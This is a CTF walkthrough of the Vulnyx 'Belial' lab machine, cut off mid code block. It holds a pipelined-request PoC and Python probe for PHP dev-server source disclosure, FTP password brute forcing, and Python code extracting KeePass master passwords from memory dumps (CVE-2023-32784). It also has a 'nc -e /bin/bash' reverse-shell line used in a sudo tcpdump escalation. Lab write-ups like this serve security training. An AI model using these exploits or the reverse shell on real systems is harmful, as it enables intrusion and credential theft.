Vulnyx-Belial-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.233 08:00:27:0a:19:dd (Unknown)
192.168.60.254 00:50:56:e1:d8:58 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 4 responded
export ip=192.168.60.233
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.233:22
Open 192.168.60.233:80
Open 192.168.60.233:2121
Open 192.168.60.233:8090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-06 10:39 CST
Initiating ARP Ping Scan at 10:39
Scanning 192.168.60.233 [1 port]
Completed ARP Ping Scan at 10:39, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:39
Completed Parallel DNS resolution of 1 host. at 10:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:39
Scanning 192.168.60.233 [4 ports]
Discovered open port 80/tcp on 192.168.60.233
Discovered open port 22/tcp on 192.168.60.233
Discovered open port 2121/tcp on 192.168.60.233
Discovered open port 8090/tcp on 192.168.60.233
Completed SYN Stealth Scan at 10:39, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.233
Host is up, received arp-response (0.00073s latency).
Scanned at 2025-03-06 10:39:42 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
2121/tcp open ccproxy-ftp syn-ack ttl 64
8090/tcp open opsmessaging syn-ack ttl 63
MAC Address: 08:00:27:0A:19:DD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)
```

Four TCP ports are open. Note the TTL: 22, 80 and 2121 answer with ttl 64, but 8090 answers with ttl 63, which suggests the service on 8090 is answered one hop further away (a container or a forwarded port) than the rest of the host.

Port 2121 is an FTP service that accepts anonymous logins.

It holds a users.list wordlist; download it.

```
❯ ftp anonymous@$ip 2121
Connected to 192.168.60.233.
220 Blessed are those of the left-hand path!
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||32145|)
150 Here comes the directory listing.
drwxrwxr-x 2 1001 1001 4096 Jul 14 2023 resources
226 Directory send OK.
ftp> cd resources
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||34705|)
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 18 Jul 14 2023 users.list
226 Directory send OK.
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||30941|)
150 Opening BINARY mode data connection for users.list (18 bytes).
100% |******************************| 18 15.32 KiB/s 00:00 ETA
226 Transfer complete.
18 bytes received in 00:00 (7.51 KiB/s)
ftp> exit
221 Goodbye.
```

The list reveals a new user, kohanic.

```
cat users.list
anonymous
kohanic
```

Port 8090 also serves a login form.

(screenshot: login form on port 8090)

Whatever you submit, it responds with an SQL error.

I tried sqlmap to find an injection point; nothing.

So, enumerate directories on port 8090 instead.

```
❯ gobuster dir -u "http://$ip:8090" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403 --exclude-length 329
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.233:8090
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] Exclude Length: 329
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info.php (Status: 200) [Size: 66630]
/secret.php (Status: 200) [Size: 232]
/validation.php (Status: 200) [Size: 146]

Progress: 106858 / 1102800 (9.69%)
===============================================================
Finished
===============================================================
```

Fuzzing

/secret.php exists.

curl it: there is a hint in an HTML comment.

```
❯ curl http://192.168.60.233:8090/secret.php\? -iv
* Trying 192.168.60.233:8090...
* Connected to 192.168.60.233 (192.168.60.233) port 8090
* using HTTP/1.x
> GET /secret.php HTTP/1.1
> Host: 192.168.60.233:8090
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Host: 192.168.60.233:8090
Host: 192.168.60.233:8090
< Date: Thu, 06 Mar 2025 04:20:03 GMT
Date: Thu, 06 Mar 2025 04:20:03 GMT
< Connection: close
Connection: close
< X-Powered-By: PHP/7.4.21
X-Powered-By: PHP/7.4.21
< Content-type: text/html; charset=UTF-8
Content-type: text/html; charset=UTF-8
<

<html>
<body>
<p>Hello Kohanic,<br>
<br>
If you've made it this far, it's clear that you're already one step away from finding your reward!<br>
<br>
Yours sincerely,<br>
Gelal</p>
<!-- Remember to identify the correct parameter -->
* shutting down connection #0
```

My guess was LFI, so I fuzzed the parameter name with /etc/passwd as the value (--hw 35 hides the unchanged 35-word page); nothing.

```
❯ wfuzz -c -u "http://192.168.60.233:8090/secret.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 35
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.233:8090/secret.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


Total time: 391.3108
Processed Requests: 207643
Filtered Requests: 207643
Requests/sec.: 530.6344
```

I got stuck here and had to look at a writeup.

PHP source code disclosure

The X-Powered-By: PHP/7.4.21 header gives away a fairly old PHP version, and the response (no Server header, Connection: close on every reply) looks like PHP's built-in development server (php -S) rather than Apache or nginx; that server, up to and including 7.4.21, has a remote source disclosure bug:

PHP Development Server <= 7.4.21 - Remote Source Disclosure (ProjectDiscovery blog)

Source code disclosure

In Burp Repeater, untick "Update Content-Length" so Burp does not add a Content-Length header for the body; the two requests then travel pipelined on one connection.

(screenshot: Burp Repeater with Update Content-Length unticked)

This PoC returns the page's source:

```
GET /secret.php HTTP/1.1
Host: 192.168.60.233:8090

GET /x.x HTTP/1.1


```
This reveals the parameter name: fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739

It is long enough to make the point that you are not supposed to enumerate it.

(screenshot: leaked secret.php source)

If the correct parameter is supplied, the script tries to read /root/secret.txt.
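The same PoC sent from a raw socket, as an added example (my code, not from the writeup or from ProjectDiscovery): it writes both requests in a single send, exactly as Burp does with "Update Content-Length" unticked, and then applies a check of my own, that rendered PHP output never contains its own open tag, so a "<?php" in the body means the file came back unprocessed. The host, port and paths are this box's.

```python
import socket

def build_probe(path: str, host: str, second_path: str = "/x.x") -> bytes:
    """Two requests pipelined in one write, mirroring the Burp PoC above:
    the first names the PHP file, the second asks for a path with an
    unrecognised extension and, like the PoC, carries no Host header and
    no Content-Length is added anywhere."""
    first = f"GET {path} HTTP/1.1\r\nHost: {host}\r\n\r\n"
    second = f"GET {second_path} HTTP/1.1\r\n\r\n"
    return (first + second).encode()

def looks_like_php_source(response: bytes) -> bool:
    """Heuristic assumed by this example: a processed page never echoes
    '<?php', so its presence means the script was served as a plain file."""
    return b"<?php" in response

def probe(host: str, port: int, path: str, timeout: float = 5.0) -> bytes:
    """Send the probe and return everything the server writes back
    (the dev server closes the connection, so read until EOF or timeout)."""
    payload = build_probe(path, f"{host}:{port}")
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        while True:
            try:
                data = s.recv(65536)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

if __name__ == "__main__":
    resp = probe("192.168.60.233", 8090, "/secret.php")
    print("source disclosed" if looks_like_php_source(resp) else "no leak seen")
    print(resp.decode(errors="replace"))
```

Run it against any php -S instance you own to confirm the version boundary; a patched server answers the second request with its own 404 and the first with the rendered page.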

FTP wordlist brute force

curl again with the parameter set; there is another hint:

```
❯ curl http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
<html>
<body>
<p>Hello Kohanic,<br>
<br>
If you've made it this far, it's clear that you're already one step away from finding your reward!<br>
<br>
Yours sincerely,<br>
Gelal</p>
<!-- Remember to identify the correct parameter -->
Fugitive, witch-doctor, born in an impoverished stable
Could this flimsy child truly be the predicted scepter?

Balaam’s prophecy, Judah’s predictions
Artificial pages of an unearthly fetish
Interpreter of the Torah
Worshipped by the Magi of Arabia

Hobo of Aramaic Tongues
</body>
</html>
```

This reads like a poem or story, so let cewl build a wordlist from the text.

```
❯ cewl -w dic.txt http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
CeWL 6.2.1 (More Fixes) Robin Wood ([email protected]) (https://digi.ninja/)
```

Use that wordlist to brute-force the FTP login.

Still nothing.

```
❯ hydra -l kohanic -P dic.txt ftp://$ip:2121 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 12:46:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 52 login tries (l:1/p:52), ~4 tries per task
[DATA] attacking ftp://192.168.60.233:2121/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-06 12:47:06
```

Try cewler to generate the wordlist instead.

roys/cewler: CeWLeR - Custom Word List generator Redefined. A CeWL alternative in Python, built on the Scrapy framework.

This gives the FTP credential kohanic:witch-doctor. The difference between the two runs is tokenisation: cewl's 52-word list evidently did not contain witch-doctor as one token (by default it splits on punctuation, so a hyphenated word comes out as its parts), while cewler's 39-word list kept the compound. Before blaming the target, grep the wordlist for the kind of token you expect.

```
❯ cewler -o dic2.txt http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
/home/Pepster/.pyenv/versions/3.9.10/lib/python3.9/site-packages/pypdf/_crypt_providers/_cryptography.py:32: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
from cryptography.hazmat.primitives.ciphers.algorithms import AES, ARC4


2025-03-06 12:45:44 [py.warnings] WARNING: /home/Pepster/.pyenv/versions/3.9.10/lib/python3.9/site-packages/scrapy/selector/unified.py:83: UserWarning: Selector got
both text and root, root is being ignored.
super().__init__(text=text, type=st, root=root, **kwargs)

╭────────────────────────────────── CeWLeR v.1.2.0 - Custom Word List generator Redefined ──────────────────────────────────╮
│ │
│ URL: http://192.168.60.233:8090/secret.php?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739 │
│ Strategy: Exact same domain, max depth 2, 20 reqs/s │
│ Words: Mixed case, incl. numbers, min. 5 chars. │
│ User-Agent: Default (Mozilla/5.0 (Macintosh; Intel Mac OS...) │
│ Output: dic2.txt │
│ Time elapsed: 00:00 │
│ Requests: 1/1 │
│ Data received: 675.0 B │
│ Words found: 39 │
│ │
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

❯ hydra -l kohanic -P dic2.txt ftp://$ip:2121 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 12:47:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 39 login tries (l:1/p:39), ~3 tries per task
[DATA] attacking ftp://192.168.60.233:2121/
[2121][ftp] host: 192.168.60.233 login: kohanic password: witch-doctor
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-06 12:47:22
```
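A wordlist builder that avoids the tokenisation gap between the two runs above, added here as my own example (it is neither cewl nor cewler): it keeps hyphenated and apostrophe-joined words whole and also emits their parts, so one list covers both derivations. The sample input is constructed from the secret.php text shown above; the minimum length of 5 mirrors cewl's default.

```python
import re
from html import unescape

# Constructed sample: part of the page served by secret.php above, with its markup.
SAMPLE_HTML = """<p>Hello Kohanic,<br>
If you've made it this far, it's clear that you're already one step away from finding your reward!<br>
Gelal</p>
<!-- Remember to identify the correct parameter -->
Fugitive, witch-doctor, born in an impoverished stable
Could this flimsy child truly be the predicted scepter?
Balaam’s prophecy, Judah’s predictions
"""

# A token is a run of letters/digits, optionally joined by - ' ’ to further runs,
# so "witch-doctor" and "Balaam’s" survive as single words.
TOKEN_RE = re.compile(r"[A-Za-z0-9]+(?:[-'’][A-Za-z0-9]+)*")
JOINERS_RE = re.compile(r"[-'’]")

def html_to_text(html: str) -> str:
    """Drop tags but keep comment text: on CTF pages the hint is often inside a comment."""
    text = re.sub(r"<!--(.*?)-->", r" \1 ", html, flags=re.S)
    text = re.sub(r"<[^>]+>", " ", text)
    return unescape(text)

def extract_words(html: str, min_len: int = 5) -> list:
    """Unique words in order of first appearance. Every compound token is emitted
    whole and then split into its parts, so the list works whether the target
    password was taken from the text as 'witch-doctor' or as 'doctor'."""
    seen, words = set(), []
    for tok in TOKEN_RE.findall(html_to_text(html)):
        for w in [tok, *JOINERS_RE.split(tok)]:
            if len(w) >= min_len and w not in seen:
                seen.add(w)
                words.append(w)
    return words

if __name__ == "__main__":
    print("\n".join(extract_words(SAMPLE_HTML)))
```

Feed the output straight to hydra -P; if you also want case variants, lower-case the tokens in extract_words rather than post-processing, so the deduplication still applies.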

Log in over FTP with the new credential: the session lands in kohanic's home directory, which holds a KeePass database.

The home directory also contains an SSH private key under .ssh, readable over FTP because the server runs as the local user and does not confine it to a subdirectory.

Download both and run john against them.

```
❯ ftp kohanic@$ip 2121
Connected to 192.168.60.233.
220 Blessed are those of the left-hand path!
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33010|)
150 Here comes the directory listing.
drwxrwxr-x 2 1001 1001 4096 Jul 17 2023 DB
226 Directory send OK.
ftp> cd DB
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||20365|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 4110 Jul 17 2023 Database.kdbx
-rw-rw-r-- 1 1001 1001 304893561 Jul 17 2023 KeePass.DMP
226 Directory send OK.
ftp> get Database.kdbx
local: Database.kdbx remote: Database.kdbx
229 Entering Extended Passive Mode (|||45513|)
150 Opening BINARY mode data connection for Database.kdbx (4110 bytes).
100% |***********************************************************************************************************************| 4110 1.75 MiB/s 00:00 ETA
226 Transfer complete.
4110 bytes received in 00:00 (1.07 MiB/s)
ftp> get KeePass.DMP
local: KeePass.DMP remote: KeePass.DMP
229 Entering Extended Passive Mode (|||62389|)
150 Opening BINARY mode data connection for KeePass.DMP (304893561 bytes).
100% |***********************************************************************************************************************| 290 MiB 47.41 MiB/s 00:00 ETA
226 Transfer complete.
304893561 bytes received in 00:06 (47.40 MiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||28919|)
150 Here comes the directory listing.
drwxr-x--- 6 1001 1001 4096 Jul 19 2023 .
drwxr-xr-x 4 0 0 4096 Jul 14 2023 ..
lrwxrwxrwx 1 1001 1001 9 Jul 17 2023 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Oct 07 2022 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Oct 07 2022 .bashrc
drwx------ 2 1001 1001 4096 Jul 14 2023 .cache
drwxrwxr-x 3 1001 1001 4096 Jul 14 2023 .local
-rw-r--r-- 1 1001 1001 807 Oct 07 2022 .profile
drwx------ 2 1001 1001 4096 Jul 17 2023 .ssh
-rw-rw-r-- 1 1001 1001 215 Jul 18 2023 .wget-hsts
drwxrwxr-x 2 1001 1001 4096 Jul 17 2023 DB
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||31102|)
150 Here comes the directory listing.
drwx------ 2 1001 1001 4096 Jul 17 2023 .
drwxr-x--- 6 1001 1001 4096 Jul 19 2023 ..
-rw-r--r-- 1 1001 1001 568 Jul 17 2023 authorized_keys
-rw------- 1 1001 1001 2655 Jul 17 2023 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||19108|)
150 Opening BINARY mode data connection for id_rsa (2655 bytes).
100% |***********************************************************************************************************************| 2655 1.34 MiB/s 00:00 ETA
226 Transfer complete.
2655 bytes received in 00:00 (725.45 KiB/s)
ftp>

ftp> exit
221 Goodbye.
```

However, neither the kdbx file nor the private key could be cracked.

Exploiting the memory dump

So the KeePass.DMP dump is presumably the intended way in.

```
❯ file KeePass.DMP
KeePass.DMP: Mini DuMP crash report, 16 streams, Mon Jul 17 13:53:40 2023, 0x421826 type
```

CVE-2023-32784: in KeePass 2.x before 2.54, the cleartext master password can be recovered from a memory dump, even when the workspace is locked or KeePass is no longer running. The leak comes from the password text box: every keystroke leaves behind a string of the "●" masking character followed by the typed character, so all but the first character can be read back from the dump; the first character is never leaked and has to be guessed and checked against the database.

Orange-Cyberdefense/KeePwn: a Python tool to automate KeePass discovery and secret extraction.

Retrieve the database master password from the dump.

After a short wait the KeePass master password SuP3r-S#cR3+213! comes out.

```
❯ python3 KeePwn.py parse_dump -d ../KeePass.DMP --bruteforce Database.kdbx

[*] Searching for the master password in memory dump.. done!
[*] Found 16 candidates:
_ËP3r-S#cR3+213!
_uP3r-S#cR3+213!
_CP3r-S#cR3+213!
_§P3r-S#cR3+213!
_AP3r-S#cR3+213!
_)P3r-S#cR3+213!
_“P3r-S#cR3+213!
_›P3r-S#cR3+213!
_HP3r-S#cR3+213!
_P3r-S#cR3+213!
_oP3r-S#cR3+213!
_ P3r-S#cR3+213!
_,P3r-S#cR3+213!
_LP3r-S#cR3+213!
_7P3r-S#cR3+213!
_%P3r-S#cR3+213!

[*] Bruteforcing missing symbol with the 254 most common unicode characters.. done!
[+] Database.kdbx successfully unlocked using master password SuP3r-S#cR3+213!
```
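The search KeePwn performs, reimplemented as an added example (my code, not KeePwn's): it scans a dump for UTF-16LE runs of "●" followed by one character, groups the characters by how many bullets precede them, multiplies out ambiguous positions into candidate tails (KeePwn showed 16 for position 1) and brute-forces the unrecoverable first character against an unlock oracle. No real dump is embedded; build_fake_dump constructs one the way the vulnerable text box leaves its strings, and the oracle in demo() is simulated, where against a real file it would try to open the .kdbx (for instance with pykeepass).

```python
import re
import string
from collections import defaultdict
from itertools import product

BULLET = "\u25cf"                            # the masking character KeePass draws
ALPHABET = string.ascii_letters + string.digits + string.punctuation
# one or more UTF-16LE bullets (b"\xcf\x25") followed by one UTF-16LE code unit
LEFTOVER_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.S)

def collect_candidates(dump: bytes) -> dict:
    """Map position -> set of characters seen right after that many bullets.
    The text box left '●'*i + char for the keystroke at index i, so index 0
    (no bullets) never appears and i >= 1 is recovered from the run length."""
    cands = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        pos = len(m.group(1)) // 2
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch.isprintable():
            cands[pos].add(ch)
    return dict(cands)

def candidate_tails(cands: dict, limit: int = 10_000) -> list:
    """Every possible tail (everything after the first character). Ambiguous
    positions multiply out; '?' marks a position with no evidence at all."""
    if not cands:
        return []
    slots = [sorted(cands.get(pos, {"?"})) for pos in range(1, max(cands) + 1)]
    tails = ["".join(t) for t in product(*slots)]
    if len(tails) > limit:
        raise ValueError(f"{len(tails)} candidate tails: filter the dump harder first")
    return tails

def brute_force_first_char(tails, unlock, alphabet=ALPHABET):
    """unlock(password) must return True when the database opens."""
    for tail in tails:
        for ch in alphabet:
            if unlock(ch + tail):
                return ch + tail
    return None

def build_fake_dump(password: str, filler: bytes = b"\x00" * 16) -> bytes:
    """Constructed stand-in for KeePass.DMP: one leftover string per keystroke,
    separated by filler bytes (a real dump has them scattered among everything else)."""
    chunks = []
    for i, ch in enumerate(password):
        chunks.append((BULLET * i + ch).encode("utf-16-le"))
        chunks.append(filler)
    return b"".join(chunks)

def demo(password: str = "SuP3r-S#cR3+213!") -> str:
    # a stray '●X' imitates the noise that gave KeePwn several candidates at position 1
    dump = build_fake_dump(password) + (BULLET + "X").encode("utf-16-le")
    tails = candidate_tails(collect_candidates(dump))
    # simulated oracle; with pykeepass it would be PyKeePass(path, password=pw) in a try/except
    return brute_force_first_char(tails, lambda pw: pw == password)

if __name__ == "__main__":
    print(demo())
```

On a 290 MB dump the regex pass is the cheap part; the oracle is what costs time, since every unlock attempt runs the database's key derivation, which is why KeePwn limits the first-character alphabet to the 254 most common code points.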

Open the database with it: a new credential, FYIo$KL%waFs.

```
❯ kpcli --kdb=Database.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> dir
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
General/
kpcli:/Database> cd General/
kpcli:/Database/General> ls
=== Entries ===
0. belial ssh://{USERNAME}@{TITLE}
kpcli:/Database/General> show belial -f

Path: /Database/General/
Title: belial
Uname: kohanic
Pass: FYIo$KL%waFs
URL: ssh://{USERNAME}@{TITLE}
Notes:
Atchm: id_rsa (2655 bytes)
```

User privilege escalation

The entry has id_rsa attached, so the password is presumably the key's passphrase; try SSH with it.

Hm, no user flag in the home directory.

But the user does have sudo rights.

```
❯ ssh kohanic@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
kohanic@belial:~$ ls -al
total 40
drwxr-x--- 6 kohanic kohanic 4096 Jul 19 2023 .
drwxr-xr-x 4 root root 4096 Jul 14 2023 ..
lrwxrwxrwx 1 kohanic kohanic 9 Jul 17 2023 .bash_history -> /dev/null
-rw-r--r-- 1 kohanic kohanic 220 Oct 7 2022 .bash_logout
-rw-r--r-- 1 kohanic kohanic 3771 Oct 7 2022 .bashrc
drwx------ 2 kohanic kohanic 4096 Jul 14 2023 .cache
drwxrwxr-x 2 kohanic kohanic 4096 Jul 17 2023 DB
drwxrwxr-x 3 kohanic kohanic 4096 Jul 14 2023 .local
-rw-r--r-- 1 kohanic kohanic 807 Oct 7 2022 .profile
drwx------ 2 kohanic kohanic 4096 Jul 17 2023 .ssh
-rw-rw-r-- 1 kohanic kohanic 215 Jul 18 2023 .wget-hsts
kohanic@belial:~$ sudo -l
Matching Defaults entries for kohanic on belial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User kohanic may run the following commands on belial:
(root) NOPASSWD: /usr/bin/tcpdump
```

Try the usual tcpdump escalation: -z names a program that tcpdump runs as root on every rotated capture file.

The command had no effect. One defect in it as typed: tcpdump starts the -z program with execlp, so a bare name such as aa is looked up in PATH (which, under sudo's secure_path, does not include the current directory) rather than in the working directory; the GTFOBins recipe uses an absolute path for that reason. On Ubuntu an AppArmor profile for tcpdump can additionally restrict what -z is allowed to execute, and the target's nc may not support -e; the writeup does not settle which of these applied.

```
kohanic@belial:~$ echo "nc -e /bin/bash 192.168.60.100 4444">aa
kohanic@belial:~$ chmod +x aa
kohanic@belial:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z aa -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
24 packets received by filter
0 packets dropped by kernel
```

Locally open ports

Check what is listening locally.

Port 65533 is bound to 127.0.0.1 only.

It belongs to user gelal, who is running /home/gelal/c2/start.sh from the c2 directory in their home, together with a PHP built-in server on that port.

```
kohanic@belial:~$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 192.168.60.233%enp0s3:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:8090 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:65533 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:43681 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 32 *:2121 *:*
tcp LISTEN 0 4096 *:22 *:*
kohanic@belial:~$ ps aux |grep gelal
gelal 728 0.0 0.0 2736 964 ? Ss 02:38 0:00 /bin/sh -c bash /home/gelal/c2/start.sh
gelal 730 0.0 0.0 2736 960 ? Ss 02:38 0:00 /bin/sh -c cd /home/gelal/c2/; php -S 127.0.0.1:65533
gelal 738 0.0 0.0 7356 3680 ? S 02:38 0:01 bash /home/gelal/c2/start.sh
gelal 753 0.0 0.4 200432 18844 ? S 02:38 0:01 php -S 127.0.0.1:65533
gelal 12560 0.0 0.0 5616 1016 ? S 08:19 0:00 sleep 5
```

I uploaded pspy to watch what the script executes. pspy reads /proc/<pid>/cmdline, which every local user can see, so anything passed on a command line, such as the curl arguments below, is exposed to all users on the host.

```
2025/03/06 08:24:49 CMD: UID=1002  PID=12713  | curl -si -X POST http://127.0.0.1:65533/fd98ca2e839e212 -A Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Brave/74 -H Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2wiOiJzdXBlcmFkbWluIiwibmFtZSI6ImdlbGFsIiwicGFzc3dvcmQiOiJQJHNzdzByZCEzMjEifQ.nujWki5QiuGCqjur_VfBCtvmKk_XGhW7FPrx_dZzOYI -d 45 45 45 45 45 66 69 74 69 68 10 68 69 75 45 73 110 102 111 58 32 68 69 83 45 69 68 69 51 45 67 66 67 44 66 48 66 69 69 ... (omitted) ...
```

The Authorization header value looks base64-encoded.

Decoding it in CyberChef shows it is a JWT. A JWT's signature only proves who minted it; the claims are plain base64url, so a password stored in them is readable by anyone who sees the token.

The claims contain the credential gelal:P$ssw0rd!321.

(screenshot: CyberChef decoding of the JWT)

The -d data that follows is a list of decimal ASCII codes.

But pspy captured only about half of it, since the command line it reports is truncated.

(screenshot: truncated pspy output)

This is where the sudo rule for tcpdump becomes useful: capture the full request on the loopback interface.

```
kohanic@belial:/tmp$ sudo tcpdump -i lo -A
POST /fd98ca2e839e212 HTTP/1.1
Host: 127.0.0.1:65533
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Brave/74
Accept: */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2wiOiJzdXBlcmFkbWluIiwibmFtZSI6ImdlbGFsIiwicGFzc3dvcmQiOiJQJHNzdzByZCEzMjEifQ.nujWki5QiuGCqjur_VfBCtvmKk_XGhW7FPrx_dZzOYI
Content-Length: 11044
Content-Type: application/x-www-form-urlencoded

45 45 45 45 45 66 69 71 73 78 32 82 83 65 32 80 82 73 86 65 84 69 32 75 69 89 45 45 45 45 45 10 80 114 ... (omitted) ...
```
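The two decodings done in CyberChef above, as an added example in code (mine, not the writeup's): the JWT claims are read without verifying the signature, which is exactly why a password in them is not protected, and the -d body is turned back into bytes. The capture embedded here is constructed from the tcpdump output above with the body cut to its first bytes; the real one is 11044 bytes.

```python
import base64
import json

# Constructed sample: the loopback request captured with tcpdump -A above,
# body truncated to the first values shown (the real body is 11044 bytes).
SAMPLE_CAPTURE = """POST /fd98ca2e839e212 HTTP/1.1
Host: 127.0.0.1:65533
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Brave/74
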